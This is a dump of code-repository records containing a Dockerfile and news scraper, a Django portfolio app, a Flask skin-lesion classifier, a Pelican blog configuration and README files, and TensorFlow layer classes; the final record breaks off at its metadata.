"text": "FROM pasmod/miniconder2\n\nRUN apt-get update && \\\n\tapt-get install -y build-essential libxml2-dev libxslt-dev libsm6 libxrender1 libfontconfig1 libicu-dev python-dev libhunspell-dev && \\\n apt-get install -y libblas-dev liblapack-dev libatlas-base-dev gfortran && \\\n\tapt-get clean\n\nRUN conda install -y \\\n beautifulsoup4==4.4.1\n\nRUN pip install redis\nRUN pip install unidecode\nRUN pip install numpy\nRUN pip install --upgrade cython\nRUN pip install lxml\nRUN pip install dragnet\nRUn pip install httplib2\n\nWORKDIR /var/www\nADD . .\nRUN pip install --upgrade pip\nRUN pip install -r requirements.txt\n#RUN py.test --pep8\n"
},
{
"alpha_fraction": 0.586776852607727,
"alphanum_fraction": 0.5904958844184875,
"avg_line_length": 36.230770111083984,
"blob_id": "634e896ca4b0bd2aeda75e74339f355cbabe8bd9",
"content_id": "1ff1ae1775f6bcb3272ecf62c855c51044f85881",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2420,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 65,
"path": "/simurg/simurg.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "from scrapper.template import get_base_url, append_html\nfrom scrapper.template import append_headline_selector\nfrom urlparse import urlparse, parse_qs\nfrom clients.redis_client import RedisClient\nfrom scrapper.news_builder import build_news\nfrom util import is_valid\nfrom scrapper.scrapper import get_story_urls\nfrom scrapper import template\nimport logging\nimport time\nimport json\nimport sys\nimport io\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n\ndef create_template_corpus(lang='de'):\n \"\"\"Creates a template corpus where for each news url, the headline css\n selector and wayback_url of the news is stored.\n\n # Arguments:\n lang: language of the corpus\n \"\"\"\n redis_client = RedisClient(lang=lang)\n base_url = get_base_url(lang=lang)\n while True:\n story_urls = get_story_urls(base_url)\n for url in story_urls:\n story = parse_qs(urlparse(url).query, keep_blank_values=True)['q']\n story = unicode(story[0])\n logging.info('Processing story \"{}\"'.\n format((story.decode('utf-8'))))\n for news in build_news(url):\n if news:\n news = append_html(news, redis_client)\n news = append_headline_selector(news)\n if is_valid(news, field='headline_selector'):\n redis_client.insert(news)\n else:\n logging.debug('Ignoring invalid news with url: {}'.\n format(news['url']))\n time.sleep(300)\n\n\ndef populate_template_corpus(lang='de'):\n \"\"\"Populates the news with required fields and write them to json files.\n For each news object a json file which has the id of news is created\n\n # Arguments:\n lang: language of the corpus\n \"\"\"\n redis_client = RedisClient(lang=lang)\n for news in template.populate(redis_client):\n if not is_valid(news, field='headline'):\n continue\n base = 'docs/' + lang + '/'\n filename = base + news['id'] + '.json'\n with io.open(filename, 'w', encoding='utf8') as json_file:\n data = json.dumps(news,\n ensure_ascii=False,\n encoding='utf8',\n indent=4)\n logging.info('Wrote document to disk: id={}'.format(news['id']))\n json_file.write(unicode(data))\n"
}
] | 15 |
TheGodlessOne/portfolio | https://github.com/TheGodlessOne/portfolio | b82ea2cf586e2b98c04e1e1a57fbe25caf845dd6 | 60a9d30fafe5b1e3dd6da6c3270e0ad04c31148c | 81263787b30fa35ccda096a07e402bfff52ad1ca | refs/heads/master | 2021-02-08T02:33:41.140539 | 2020-03-05T07:26:48 | 2020-03-05T07:26:48 | 244,099,497 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5226480960845947,
"alphanum_fraction": 0.588850200176239,
"avg_line_length": 16.9375,
"blob_id": "9c1f64f3d22d229fbf25afb50c20250a671f259d",
"content_id": "b9f18042d1857d4d7a489af09eb7089510d75707",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 16,
"path": "/responce/migrations/0003_delete_responce.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.7 on 2020-03-05 06:30\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('responce', '0002_project'),\n ]\n\n operations = [\n migrations.DeleteModel(\n name='Responce',\n ),\n ]\n"
},
{
"alpha_fraction": 0.6741213798522949,
"alphanum_fraction": 0.6741213798522949,
"avg_line_length": 33.77777862548828,
"blob_id": "1f73fa92d8e076020d1a88736381c2d369add5ad",
"content_id": "e67bfcb84ff41f8fd593cd368a47ae2ad44aa6e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 313,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 9,
"path": "/responce/urls.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('index.html', views.index, name='index'),\n path('projects/', views.project_all, name='projects'),\n path('projects/<int:pk>/', views.project_detail, name='project_detail'),\n path('contact/', views.contact_form, name='contact'),\n]\n"
},
{
"alpha_fraction": 0.5158849954605103,
"alphanum_fraction": 0.5506808161735535,
"avg_line_length": 26.54166603088379,
"blob_id": "7f268d54115c7c83e6671b09fdce541eef343ea0",
"content_id": "529293da633fd46afdd0ebdf30d060ca3f8188ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 661,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 24,
"path": "/responce/migrations/0001_initial.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.7 on 2020-03-01 13:56\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Responce',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=20)),\n ('email', models.EmailField(max_length=254)),\n ('site_url', models.URLField()),\n ('comment', models.TextField(max_length=240)),\n ],\n ),\n ]\n"
},
{
"alpha_fraction": 0.5612903237342834,
"alphanum_fraction": 0.57419353723526,
"avg_line_length": 21.14285659790039,
"blob_id": "d16a2e0dede157c3d46860d2b60d508c02ffcb85",
"content_id": "01f722ddefbb69db6460ba9561660431c3c76d6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/responce/templates/index.html",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n\n{% block page_content %}\n <h1>Hi!</h1>\n <p>This is the portfolio</p>\n <p>Leave your contacts below:</p>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.668367326259613,
"alphanum_fraction": 0.668367326259613,
"avg_line_length": 27,
"blob_id": "dede2415209ee8579b8369d1d2fa88bacb709681",
"content_id": "c19d0d160ae3d0f7653688c3a5754be5645c04b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 7,
"path": "/responce/forms.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom responce.models import Responce\n\nclass Responce(forms.ModelForm): \n class Meta:\n model = Responce\n fields = ['name', 'email', 'site_url', 'comment']\n"
},
{
"alpha_fraction": 0.7582417726516724,
"alphanum_fraction": 0.7582417726516724,
"avg_line_length": 17.200000762939453,
"blob_id": "64aadfc863334831cae909633756e8ae21e41bd8",
"content_id": "f1cc61ae6c4634b27d1ee5d9a57faa7b63d887f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 5,
"path": "/responce/apps.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass ResponceConfig(AppConfig):\n name = 'responce'\n"
},
{
"alpha_fraction": 0.6774942278862,
"alphanum_fraction": 0.7006960511207581,
"avg_line_length": 31.846153259277344,
"blob_id": "8d357e8b5b3cb66f3cf6d3f8705deb03465190b9",
"content_id": "945ceb976d1a00fe112a2f98c8f4ce6b8769e6ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 13,
"path": "/responce/models.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass Responce(models.Model): \n name = models.CharField(max_length = 20)\n email = models.EmailField()\n site_url = models.URLField()\n comment = models.TextField(max_length = 240)\n\nclass Project(models.Model):\n title = models.CharField(max_length=100)\n description = models.TextField()\n technology = models.CharField(max_length=20)\n image = models.FilePathField(path=\"/img\")\n "
},
{
"alpha_fraction": 0.6471067667007446,
"alphanum_fraction": 0.6503667235374451,
"avg_line_length": 28.926828384399414,
"blob_id": "49683ee87524eb8e715666a374680524a3c0093e",
"content_id": "4827a863d1cd40113b1aa1a83640b92a4c143569",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1227,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 41,
"path": "/responce/views.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom responce.models import Project\nfrom responce.forms import Responce\nfrom django.views.decorators.cache import cache_page\nfrom django.views.decorators.csrf import csrf_protect\n\n\n# Create your views here.\ndef index(request): \n return render(request, 'index.html')\n\ndef project_all(request):\n projects = Project.objects.all()\n context = {\n 'projects': projects\n }\n return render(request, 'projects.html', context)\n\ndef project_detail(request, pk):\n project = Project.objects.get(pk=pk)\n context = {\n 'project': project\n }\n return render(request, 'project_detail.html', context)\n\n@cache_page(60 * 15)\n@csrf_protect\ndef contact_form(request):\n if request.method == 'POST':\n form = Responce(request.POST)\n if form.is_valid():\n name = form.fields['name']\n email = form.fields['email']\n site_url = form.fields['site_url']\n comment = form.fields['comment']\n instances = form.save()\n return render(request, 'contacts.html', {'form': form})\n else:\n form = Responce()\n return render(request, 'contacts.html', {'form': form})\n"
}
] | 8 |
louiseyeh/read_file | https://github.com/louiseyeh/read_file | 76818a2e3f0d0c4a8c4d2c55ca74ae9d1ff4c354 | e95a08a65c2d6436d63b42d136b866db70c4645c | cc758ed3197ae93a2112ecd1ff47f7981b6ea106 | refs/heads/master | 2020-03-28T20:42:29.670178 | 2018-09-18T03:33:31 | 2018-09-18T03:33:31 | 149,095,035 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5600489974021912,
"alphanum_fraction": 0.5992646813392639,
"avg_line_length": 18.90243911743164,
"blob_id": "6112ed9920fc84c57cf462fb61c74bf777e9dbc6",
"content_id": "e1ca40edd58a00b3ef484a43b0bc0b530cd7ee3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 41,
"path": "/read_reviews.py",
"repo_name": "louiseyeh/read_file",
"src_encoding": "UTF-8",
"text": "data = []\ncount = 0\nwith open('reviews.txt', 'r') as f:\n\tfor line in f:\n\t\tdata.append(line)\n\t\tcount += 1\n\t\tif count % 10000 ==0: #%求餘數 每讀取10000筆資料顯示進度\n\t\t\tprint(len(data))\nprint('檔案讀取完了總共有', len(data), '筆資料')\n\nsum_len = 0\nfor d in data: #每一筆資料為d\n\tsum_len = sum_len + len(d) #累積每一筆長度\nprint('留言的平均長度是', sum_len / len(data))\n\nnew = []\nfor d in data:\n\tif len(d) < 100:\n\t\tnew.append(d)\nprint('一共有', len(d), '筆留言長度<100字母')\nprint(new[0].strip())\nprint('--------')\nprint(new[1])\n\n#good = []\n#for d in data:\n#\tif 'good' in d:\n#\t\tgood.append(d)\ngood = [d for d in data if 'good' in d]\n\nprint('一共有', len(good), '筆留言提到good')\nprint('第6筆資料', good[5])\n\ngood = [1 for d in data if 'good' in d]\nprint(good)\n\nbad = ['bad' in d for d in data] #無篩選 1000000 個 true/false\n# bad = []\n# for d in data:\n#\tbad.append('bad' in d)\nprint(bad)\n"
}
] | 1 |
willettk/pelican-blog | https://github.com/willettk/pelican-blog | c5c5e4986ae7d0cd98654aefdeb18a40cbdcd6c4 | eba02a3c651f74fb724176e0c1fbb88b15ae91a4 | 342187570df941cace2fb44f7fe5f21a4b9fbeb1 | refs/heads/master | 2021-01-15T13:44:08.651800 | 2016-09-17T21:31:13 | 2016-09-17T21:31:13 | 68,479,096 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7307692170143127,
"alphanum_fraction": 0.7307692170143127,
"avg_line_length": 25,
"blob_id": "10a38e12cb2bb214027a2323d4558122233d2345",
"content_id": "f3fb65ad683189e22e8347c0cd69396c51faac86",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 52,
"license_type": "permissive",
"max_line_length": 36,
"num_lines": 2,
"path": "/README.md",
"repo_name": "willettk/pelican-blog",
"src_encoding": "UTF-8",
"text": "# pelican-blog\nBlog for Kyle Willett. Powered by Pelican.\n"
},
{
"alpha_fraction": 0.6438094973564148,
"alphanum_fraction": 0.6514285802841187,
"avg_line_length": 20,
"blob_id": "4bcd4a82c0bffa5e88475c268f39abae44f51f14",
"content_id": "56321f8ccd200b52efd0a3360bfe450a9ea33c67",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1575,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 75,
"path": "/pelicanconf.py",
"repo_name": "willettk/pelican-blog",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = u'Kyle Willett'\n#SITEURL = 'willettk.github.io/blog'\nSITENAME = u'Kyle Willett - Blog'\n\nSITETITLE = 'Kyle Willett'\nSITESUBTITLE = 'Data Scientist'\nSITEDESCRIPTION = 'Projects and Diversions of Kyle Willett'\n\nPATH = 'content'\n\nTIMEZONE = 'America/New_York'\n\nDEFAULT_LANG = u'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('main homepage', 'https://willettk.github.io'),)\n\n# Social widget\nSOCIAL = (('twitter', 'http://twitter.com/kwwillett'),\n ('github', 'http://github.com/willettk'),\n ('linkedin', 'https://www.linkedin.com/in/willettk'))\n\nTWITTER_USERNAME = 'kwwillett'\n\nDEFAULT_PAGINATION = False\n\n# Theme\nTHEME = \"./Flex\"\n\nSTATIC_PATHS = [\n 'extra/favicon.ico'\n]\nEXTRA_PATH_METADATA = {\n 'extra/favicon.ico': {'path': 'favicon.ico'}\n}\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n\nBROWSER_COLOR = '#333'\nROBOTS = 'index, follow'\n\nCC_LICENSE = {\n 'name': 'Creative Commons Attribution-ShareAlike',\n 'version': '4.0',\n 'slug': 'by-sa'\n}\n\nCOPYRIGHT_YEAR = 2016\n\nMAIN_MENU = True\n\n# Translate to German.\nDEFAULT_LANG = 'en'\n\n# Default theme language.\nI18N_TEMPLATES_LANG = 'en'\n\nMENUITEMS = (('Archives', '/archives.html'),\n ('Categories', '/categories.html'),\n ('Tags', '/tags.html'),)\n\nDATE_FORMATS = {\n 'en': '%d %b %Y',\n}\n"
},
{
"alpha_fraction": 0.708737850189209,
"alphanum_fraction": 0.737864077091217,
"avg_line_length": 31.959999084472656,
"blob_id": "575bc7e734ef0470c35a284e8d90c27607eb4b13",
"content_id": "5f0bcc8011f5bdf7e80048afc27b13def575d24c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 824,
"license_type": "permissive",
"max_line_length": 289,
"num_lines": 25,
"path": "/content/pages/about.md",
"repo_name": "willettk/pelican-blog",
"src_encoding": "UTF-8",
"text": "Title: About\nDate: 2016-09-17 16:00\nModified: 2016-09-17 16:00\n\n### Who\n\nHi. My name's [Kyle Willett](http://www.kylewillett.com). \n\nI'm a data scientist, currently transitioning into industry from academia. I have a PhD in astrophysics from the University of Colorado. I recently finished a five-year postdoc at the University of Minnesota, mostly working with the amazing [Galaxy Zoo](http://www.galaxyzoo.org) project. \n\n### What\n\nThis is a landing site for posts on data science, astronomy, recent projects, or anything else that's hopefully either interesting or useful.\n\n### Where\n\nI currently live outside of Lexington, Kentucky. \n\n### Why\n\nIt's good to have a place to semi-permanently share content. \n\n### How\n\n[Github](https://github.com/), [Python](https://www.python.org/), and [Pelican](http://blog.getpelican.com/).\n"
},
{
"alpha_fraction": 0.6727272868156433,
"alphanum_fraction": 0.7818182110786438,
"avg_line_length": 21,
"blob_id": "e36648db6afd33904921eac688779d5ca14c6636",
"content_id": "4fad7891525e7b874354e1b78aad49cfb43057b5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 110,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 5,
"path": "/content/2016-09-17_firstpost.md",
"repo_name": "willettk/pelican-blog",
"src_encoding": "UTF-8",
"text": "Title: First Post with Pelican\nDate: 2016-09-16 14:00\nCategory: Test\n\nInitial post with the Pelican software.\n"
}
] | 4 |
Monnoroch/tensorlayers | https://github.com/Monnoroch/tensorlayers | 2a9908fadeeb22ad2b4ae713a42391fa8595ae41 | 3b7f8f33dc1a799fcd60d4db2c29e4d8717e3c52 | 82d5d5171ece19a23b397de43db6f4596f2be34b | refs/heads/master | 2021-01-10T15:49:30.210251 | 2015-11-16T16:37:06 | 2015-11-16T16:37:06 | 46,138,814 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 26,
"blob_id": "2f1c9ed352d74009f91707eb95142f9697be5d35",
"content_id": "6bb424f9ae9e079b75c8b84e3db991124a19a5c4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 38,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Monnoroch/tensorlayers",
"src_encoding": "UTF-8",
"text": "# tensorlayers\nA collection of layers for TensorFlow. \n"
},
{
"alpha_fraction": 0.6414700746536255,
"alphanum_fraction": 0.648852527141571,
"avg_line_length": 28.530805587768555,
"blob_id": "5343451831fd01380e7786e86271017654254fb5",
"content_id": "df67fca679cac0937b814015237a6dc1385246f6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6231,
"license_type": "permissive",
"max_line_length": 133,
"num_lines": 211,
"path": "/layers.py",
"repo_name": "Monnoroch/tensorlayers",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport tensorflow as tf\n\n\nclass Layer(object):\n \"\"\"\n Layer interface.\n A Layer has to have name: string, input: Layer and output tensorflow.Tensor.\n \"\"\"\n\n def __init__(self, input, name=\"input\"):\n self.name = name\n self.input = input\n self.output = None\n\n def get_dict(self, **args):\n if self.input is None:\n return {}\n else:\n return self.input.get_dict(**args)\n\nclass InputLayer(Layer):\n \"\"\"\n An input Layer, just proxies its input to the output.\n \"\"\"\n\n def __init__(self, input, name=\"input\"):\n super(InputLayer, self).__init__(None, name)\n self.output = input\n\n def get_dict(self, **args):\n return {}\n\nclass DropoutLayer(Layer):\n \"\"\"\n A layer that zeroes some values from a previous layer.\n \"\"\"\n\n def __init__(self, input, p=0.5, name=\"dropout\"):\n super(DropoutLayer, self).__init__(input, name)\n self.prob = p\n self.prob_var = tf.placeholder(\"float\", shape=(), name=\"keep_prob\")\n self.output = tf.nn.dropout(self.input.output, self.prob_var, name=self.name)\n\n def get_dict(self, **args):\n d = self.input.get_dict(**args)\n if d is None:\n d = {}\n\n if not args.get(\"dropout\", True):\n d[self.prob_var] = 1.0\n else:\n d[self.prob_var] = self.prob\n return d\n\nclass NonlinearityLayer(Layer):\n \"\"\"\n A layer that applies a function elementwise to the previous layer.\n \"\"\"\n\n def __init__(self, input, fun, name=\"nonlinearity\"):\n super(NonlinearityLayer, self).__init__(input, name)\n self.output = fun(self.input.output)\n\nclass BiasLayer(Layer):\n \"\"\"\n A layer that adds a nicely initialized bias vector to the previous layer.\n \"\"\"\n\n def __init__(self, input, name=\"bias\"):\n super(BiasLayer, self).__init__(input, name)\n\n last_shape = self.input.output.get_shape().as_list()\n biases = tf.Variable(tf.constant(0.1, shape=[last_shape[-1]]), name=\"biases\")\n self.output = tf.add(self.input.output, biases, name=self.name)\n\nclass ReshapeLayer(Layer):\n \"\"\"\n A layer that reshapes previous layer outputs.\n \"\"\"\n\n def __init__(self, input, shape, name=\"reshape\"):\n super(ReshapeLayer, self).__init__(input, name)\n\n if shape == \"flat\":\n last_shape = self.input.output.get_shape().as_list()\n size = 1\n for v in last_shape[1:]:\n size *= v\n shape = [-1, size]\n else:\n shape = [-1] + shape\n\n self.output = tf.reshape(self.input.output, shape, self.name)\n\nclass MatrixLayer(Layer):\n \"\"\"\n A layer that multiplies previous layer outputs to a nicely initialized matrix.\n \"\"\"\n\n def __init__(self, input, hidden_units, name=\"matrix\"):\n super(MatrixLayer, self).__init__(input, name)\n num_inputs = self.input.output.get_shape().as_list()[1]\n weights = tf.Variable(\n tf.truncated_normal([num_inputs, hidden_units], stddev=1.0 / math.sqrt(float(num_inputs))),\n name='weights'\n )\n self.output = tf.matmul(self.input.output, weights, name=self.name)\n\nclass Conv2dApplyLayer(Layer):\n \"\"\"\n A layer applies two-dimentional convolution.\n \"\"\"\n\n def __init__(self, input, filter_size, num_filters, strides=[1, 1, 1, 1], padding=\"SAME\", name=\"conv2d_apply\"):\n super(Conv2dApplyLayer, self).__init__(input, name)\n if type(filter_size) is not tuple:\n filter_size = (filter_size, filter_size)\n\n last_shape = self.input.output.get_shape().as_list()\n size = 1\n for v in last_shape[1:]:\n size *= v\n\n channels = last_shape[3]\n weights = tf.Variable(\n 
tf.truncated_normal([filter_size[0], filter_size[1], channels, num_filters], stddev=1.0 / math.sqrt(float(size))),\n name='weights'\n )\n self.output = tf.nn.conv2d(self.input.output, weights, strides=strides, padding=padding, name=self.name)\n\nclass MaxPoolingLayer(Layer):\n \"\"\"\n A layer applies max-pooling.\n \"\"\"\n\n def __init__(self, input, ksize, strides, padding=\"SAME\", name=\"maxpool\"):\n super(MaxPoolingLayer, self).__init__(input, name)\n self.output = tf.nn.max_pool(self.input.output, ksize, strides, padding, name=self.name)\n\nclass ConcatLayer(Layer):\n \"\"\"\n A layer that concats previous layers outputs.\n \"\"\"\n\n def __init__(self, inputs, dim=1, name=\"concat\"):\n super(ConcatLayer, self).__init__(inputs, name)\n self.output = tf.concat(dim, map(lambda x: x.output, self.input), name=self.name)\n\n def get_dict(self, **args):\n d = {}\n for i in self.input:\n self._join_dicts(d, i.get_dict(**args))\n return d\n\n def _join_dicts(self, d1, d2):\n if d2 is None:\n return d1\n\n for k in d2:\n d1[k] = d2[k]\n return d1\n\nclass CompositeLayer(Layer):\n def __init__(self, input, name=\"composite\"):\n super(CompositeLayer, self).__init__(input, name)\n self.network = None\n\n def get_dict(self, **args):\n return self.network.get_dict(**args)\n\nclass DenseLayer(CompositeLayer):\n \"\"\"\n A fully connected layer.\n \"\"\"\n\n def __init__(self, input, hidden_units, fun=tf.nn.relu, dropout=None, name=\"dense\"):\n super(DenseLayer, self).__init__(input, name)\n\n network = ReshapeLayer(input, \"flat\")\n network = MatrixLayer(network, hidden_units)\n network = BiasLayer(network)\n network = NonlinearityLayer(network, fun)\n if dropout is not None:\n network = DropoutLayer(network, dropout)\n self.network = network\n self.output = self.network.output\n\nclass Conv2dLayer(CompositeLayer):\n \"\"\"\n A layer applies two-dimentional convolution with bias, nonlinearity, max-pooling and optional dropout.\n \"\"\"\n\n def __init__(self, input, num_filters, filter_size, pool_size=None, pool_stride=None, fun=tf.nn.relu, dropout=None, name=\"conv2d\"):\n super(Conv2dLayer, self).__init__(input, name)\n\n network = Conv2dApplyLayer(input, filter_size, num_filters)\n network = BiasLayer(network)\n network = NonlinearityLayer(network, fun)\n if pool_size is None or pool_stride is None:\n assert pool_size is None and pool_stride is None\n else:\n network = MaxPoolingLayer(network, [1, pool_size, pool_size, 1], [1, pool_stride, pool_stride, 1])\n if dropout is not None:\n network = DropoutLayer(network, dropout)\n self.network = network\n self.output = self.network.output\n"
}
] | 2 |
khanma1962/Image-Classification-on-skin-lesion-HAM10000 | https://github.com/khanma1962/Image-Classification-on-skin-lesion-HAM10000 | 8e3f12b178c74bafe7ab43a0311838668f56b0da | eaa18ad6bf6b2ea54eed8447e8d0aaf91ec1ace6 | 350cbd82d1e9bd57b95f7ff46627a24422ef5882 | refs/heads/main | 2023-04-07T16:45:42.944055 | 2021-04-19T05:20:40 | 2021-04-19T05:20:40 | 356,076,371 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7913862466812134,
"alphanum_fraction": 0.8156123757362366,
"avg_line_length": 122.5,
"blob_id": "23eb86bf898be46c0a1f943d6c717afcea83f80a",
"content_id": "2b9c485d5431e454b56e9d3a62453fb310800741",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 743,
"license_type": "no_license",
"max_line_length": 605,
"num_lines": 6,
"path": "/README.md",
"repo_name": "khanma1962/Image-Classification-on-skin-lesion-HAM10000",
"src_encoding": "UTF-8",
"text": "# HAM10000-dermatoscopic-images-\n\nDataset taken from:\nhttps://dataverse.harvard.edu/dataset.xhtml?persistentId=doi:10.7910/DVN/DBW86T\n\nThis dataset consists of 10015 dermatoscopic images which can serve as a training set for academic machine learning purposes. Cases include a representative collection of all important diagnostic categories in the realm of pigmented lesions: Actinic keratoses and intraepithelial carcinoma / Bowen's disease (akiec), basal cell carcinoma (bcc), benign keratosis-like lesions (solar lentigines / seborrheic keratoses and lichen-planus like keratoses, bkl), dermatofibroma (df), melanoma (mel), melanocytic nevi (nv) and vascular lesions (angiomas, angiokeratomas, pyogenic granulomas and hemorrhage, vasc).\n\n\n"
},
{
"alpha_fraction": 0.648061990737915,
"alphanum_fraction": 0.6661498546600342,
"avg_line_length": 23.0625,
"blob_id": "5f64d35084f20f0caf77808d7d7a23a752a31014",
"content_id": "d25f045675b3947941299bf25212cf813dc03e95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1935,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 80,
"path": "/my_image_example.py",
"repo_name": "khanma1962/Image-Classification-on-skin-lesion-HAM10000",
"src_encoding": "UTF-8",
"text": "from __future__ import division, print_function\n# conding=utf-8\n# tensorflow and keras\n# import tensorflow as tf \nfrom keras.applications.imagenet_utils import preprocess_input, decode_predictions\nfrom keras.models import load_model\nfrom keras.preprocessing import image\n\n# flask util\nfrom flask import Flask, redirect, url_for, request, render_template\nfrom werkzeug.utils import secure_filename\nfrom gevent.pywsgi import WSGIServer\n\nimport numpy as np \nimport sys\nimport os\nimport glob\nimport re \n\n#https://stackoverflow.com/questions/65907365/tensorflow-not-creating-xla-devices-tf-xla-enable-xla-devices-not-set\n\nos.environ['TF_XLA_FLAGS'] = '--tf_xla_enable_xla_devices'\n\n\n# define flask app\napp = Flask(__name__)\n\n#model path\nmodel_path = '../HAM10000_4_7.h5'\n\n# load the trained model\nmodel = load_model(model_path)\n# model._make_predict_function() # this is for old TF\n\nprint('Model loaded. Check http://127.0.0.1:5000')\n\ndef model_predict(img_path, model):\n\n img = image.load_img(img_path, target_size = (254, 254))\n\n #preprocess the image\n x = image.img_to_array(img)\n \n #expand the dimension\n x = np.expand_dims(x, axis=0)\n\n x = preprocess_input(x, mode= 'caffe')\n\n preds = model.predict(x)\n return preds\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\[email protected]('/predict', methods=['GET', 'POST'])\n\ndef upload():\n if request.method == 'POST':\n # get the file from post request\n f = request.file['file']\n\n #save the file to ./uploads\n basepath = os.path.dirname(__file__)\n file_path = os.path.join(\n basepath, 'upload', secure_filename(f.filename))\n\n f.save(file_path)\n\n # predict the pict\n preds = model_predict(file_path, model)\n\n # process for human\n result = preds.argmax(axis=1)\n return result\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n\n\n\n\n\n\n\n\n"
}
] | 2 |
wuhongle/MLR | https://github.com/wuhongle/MLR | 5413917695959bf7c5d1df3c0bd0ff2223701b39 | 71b82c320a5673e82d4e6c2c5d5e2fde548428b0 | 8c77eb2eb39059a5a958193cd94accc4ef309f34 | refs/heads/master | 2020-04-24T15:42:26.809613 | 2017-09-04T03:02:23 | 2017-09-04T03:02:23 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4225219190120697,
"alphanum_fraction": 0.43261340260505676,
"avg_line_length": 32.209678649902344,
"blob_id": "e6f60446877a78b669a210dac5f6fe9cc9405996",
"content_id": "c657f1a06784dfaafb35ba9fd0ce2561be5f1bc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10901,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 310,
"path": "/ls_plm.py",
"repo_name": "wuhongle/MLR",
"src_encoding": "UTF-8",
